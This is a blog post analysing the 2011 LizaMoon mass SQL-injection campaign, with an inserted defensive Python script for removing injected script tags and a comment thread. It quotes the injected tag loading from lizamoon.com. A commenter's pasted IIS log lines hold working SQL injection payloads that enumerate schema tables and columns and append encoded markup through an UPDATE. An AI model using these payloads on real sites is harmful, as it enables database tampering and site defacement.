What a match it was. Since yesterday morning I had been trying to concentrate on LizaMoon and a small piece of IPC code, but the ICC World Cup semi-final got the better of me.
Now, back to work; here is the analysis of LizaMoon.
A Google search for LizaMoon returns 250,000+ results.
What exactly is LizaMoon?
LizaMoon is a mass-injection attack that inserts the following code into web pages:
<script src=hxxp://lizamoon.com/ur.php></script>
The script contained simple JavaScript code that redirected the user to a well-known rogue AV site: hxxp://defender-uqko.in. At the time of writing, both the rogue AV site and the lizamoon sites are unavailable.
Some site admins have taken steps to remove the injected code. Link
This is the only substantive information available on the internet about LizaMoon; the rest are spin-offs.
At first glance it is quite surprising to find 250,000+ infected URLs; secondly, the majority of the infected sites were running IIS on Windows Server 2003 (W2k3).
This was a mass SQL injection attack, and it is the first time someone has gone to such lengths to inject code into so many sites.
I presume an automated system was used to search for vulnerable servers.
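As an added example (not code from the original post or from any of the affected sites), here is the kind of clean-up script a site admin would run once the injection is confirmed: it finds external `<script src=...></script>` tags whose host is on a known-bad list and strips them from a text column using bound parameters, so the repair itself cannot be injected into. An in-memory SQLite table stands in for the SQL Server product table; the table and column names, the three sample rows and the `cdn.example.invalid` host are constructed for the example, and lizamoon.com is the host named above.

```python
import re
import sqlite3

# Hosts named in the write-up as serving the injected script (extend from your own IoCs).
KNOWN_BAD_HOSTS = {"lizamoon.com"}

# External script tag with the src host captured; quotes around the src are optional,
# which matches the unquoted form the campaign injected (<script src=http://...></script>).
SCRIPT_TAG = re.compile(
    r"<script[^>]*\bsrc\s*=\s*[\"']?(?:https?:)?//([^/\"'\s>]+)[^>]*>\s*</script\s*>",
    re.IGNORECASE,
)

# Only plain identifiers are accepted for table/column names, since those cannot be bound.
IDENT = re.compile(r"^[A-Za-z_][A-Za-z0-9_]*$")


def find_injected(html, bad_hosts=KNOWN_BAD_HOSTS):
    """Return the text of every script tag in html that loads from a known-bad host."""
    return [m.group(0) for m in SCRIPT_TAG.finditer(html)
            if m.group(1).lower() in bad_hosts]


def strip_injected(html, bad_hosts=KNOWN_BAD_HOSTS):
    """Remove only the script tags pointing at a known-bad host; other markup is untouched."""
    def drop_if_bad(m):
        return "" if m.group(1).lower() in bad_hosts else m.group(0)
    return SCRIPT_TAG.sub(drop_if_bad, html)


def clean_table(conn, table, column, key, bad_hosts=KNOWN_BAD_HOSTS):
    """Rewrite every row of table whose column carries an injected tag; returns the row count.

    Identifiers are validated and double-quoted, values go through bound parameters."""
    for name in (table, column, key):
        if not IDENT.match(name):
            raise ValueError(f"refusing to use non-identifier name {name!r}")
    select = f'SELECT "{key}", "{column}" FROM "{table}"'
    update = f'UPDATE "{table}" SET "{column}" = ? WHERE "{key}" = ?'
    fixed = 0
    # list() exhausts the cursor before any UPDATE runs against the same table.
    for row_id, text in list(conn.execute(select)):
        if text and find_injected(text, bad_hosts):
            conn.execute(update, (strip_injected(text, bad_hosts), row_id))
            fixed += 1
    conn.commit()
    return fixed


def demo():
    """Constructed product table: one injected row, one clean row, one with a legitimate script."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE product (ProductId INTEGER PRIMARY KEY, Description TEXT)")
    rows = [
        (1, "<p>Paintball kit</p><script src=http://lizamoon.com/ur.php></script>"),
        (2, "<p>Clean description</p>"),
        (3, '<p>Uses our own script</p><script src="https://cdn.example.invalid/app.js"></script>'),
    ]
    conn.executemany("INSERT INTO product VALUES (?, ?)", rows)
    fixed = clean_table(conn, "product", "Description", "ProductId")
    after = dict(conn.execute("SELECT ProductId, Description FROM product"))
    return fixed, after


if __name__ == "__main__":
    count, rows = demo()
    print(f"rows repaired: {count}")
    for row_id, text in rows.items():
        print(row_id, text)
```

Run it as-is to see the single injected row repaired while the site's own script tag survives; against a real database, swap the sqlite3 connection for the site's DB driver and keep the same bound-parameter UPDATE.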
9 Comments
freesoft
Thank you..really informative!!
Sook
Where exactly is the facebook like button ?
Cortez
hi, superb blog site, and a very good understand! at least one for my bookmarking.
eivai
Good to see that some people really write good content nowadays. Off-topic: I don’t know why, but I’m having JavaScript errors viewing your website on Internet Explorer.. can you check it please? Best Regards
Stanford Thall
I really like what you post here. Very insightful and intelligent. One problem though. I’m running Opera with Debian and parts of your current layout pieces are a little wonky. I realize it’s not a typical set up. Yet it’s something to keep in mind. I hope that it will help and continue to keep up the top quality writing.
R Sachin
Hello,
Your query has been forwarded. We will check it out.
regards
Sachin R
botox Kraków
I quite enjoy what you submit right here. Particularly insightful and intelligent. One concern though. I’m running Firefox with Debian and parts of your current web design pieces are a little wonky. I realize it’s not a popular set up. But it’s an issue to hold in the mind. I wish that it will probably help and keep the top rated quality writing.
R Sachin
Hello,
We are looking into this. Hopefully the issue will be resolved before the next blog is published.
regards
Sachin R
Leon
Interesting blog.
It seems like the attack happens in two separate steps:
1. Get table and column structure
=============================
The attacker visits and gets information on the table and column structure of the database with the following (as I picked up from the IIS log files on a site I have that got infected – Windows 2008, IIS7 and SQL Server 2008):
2011-04-09 22:49:17 myserverip GET /ViewProduct.aspx ProductId=1%27%20or%201%3D(select%20top%201%20cast(checksum(*)%20as%20nvarchar)%2Bchar(0x7e)%2Btable%5Fname%20from%20information%5Fschema.tables%20%20where%20checksum(*)%3E-1196899800%20order%20by%20checksum(*))-- 80 - 91.207.60.5 Mozilla/4.0+(compatible;+Synapse) 500 0 0 519
...lots of these
So from the information_schema.tables view it gets the table names.
Then it gets the column names as follows:
2011-04-09 22:49:28 myserverip GET /ViewProduct.aspx ProductId=1%27%20or%201%3D(select%20top%201%20cast(ordinal%5Fposition%20as%20nvarchar)%2Bchar(0x7e)%2Bcolumn%5Fname%2Bchar(0x7e)%2Bdata%5Ftype%20from%20information%5Fschema.columns%20where%20ordinal%5Fposition%3D1%20%20and%20table%5Fname%3Dchar(111)%2Bchar(114)%2Bchar(100)%2Bchar(101)%2Bchar(114)%2Bchar(105)%2Bchar(116)%2Bchar(101)%2Bchar(109)%20order%20by%20ordinal%5Fposition)-- 80 - 91.207.60.5 Mozilla/4.0+(compatible;+Synapse) 500 0 0 785
...lots of these as well, from the information_schema.columns view.
2. Malicious table update
===================
A few days later other visits happen. As the attacker now has the database structure, he can be very specific and update Description columns with the junk.
2011-04-19 15:32:58 myserverip GET /products.aspx Category=Paintball%20Kits1'+update+product+set+Description=cast(Description+as+varchar(8000))%2Bcast(char(60)%2Bchar(47)%2Bchar(116)%2Bchar(105)%2Bchar(116)%2Bchar(108)%2Bchar(101)%2Bchar(62)%2Bchar(60)%2Bchar(97)%2Bchar(32)%2Bchar(115)%2Bchar(116)%2Bchar(121)%2Bchar(108)%2Bchar(101)%2Bchar(61)%2Bchar(100)%2Bchar(105)%2Bchar(115)%2Bchar(112)%2Bchar(108)%2Bchar(97)%2Bchar(121)%2Bchar(58)%2Bchar(110)%2Bchar(111)%2Bchar(110)%2Bchar(101)%2Bchar(59)%2Bchar(32)%2Bchar(104)%2Bchar(114)%2Bchar(101)%2Bchar(102)%2Bchar(61)%2Bchar(104)%2Bchar(116)%2Bchar(116)%2Bchar(112)%2Bchar(58)%2Bchar(47)%2Bchar(47)%2Bchar(98)%2Bchar(111)%2Bchar(111)%2Bchar(107)%2Bchar(102)%2Bchar(117)%2Bchar(108)%2Bchar(97)%2Bchar(46)%2Bchar(99)%2Bchar(111)%2Bchar(109)%2Bchar(32)%2Bchar(62)%2Bchar(98)%2Bchar(111)%2Bchar(111)%2Bchar(107)%2Bchar(60)%2Bchar(47)%2Bchar(97)%2Bchar(62)+as+varchar(8000))-- 80 - 194.28.44.190 Mozilla/5.0+(Windows;+U;+Windows+NT+5.0;+en-US;+rv:1.4)+Gecko/20780624+Netscape/
Hope it helps someone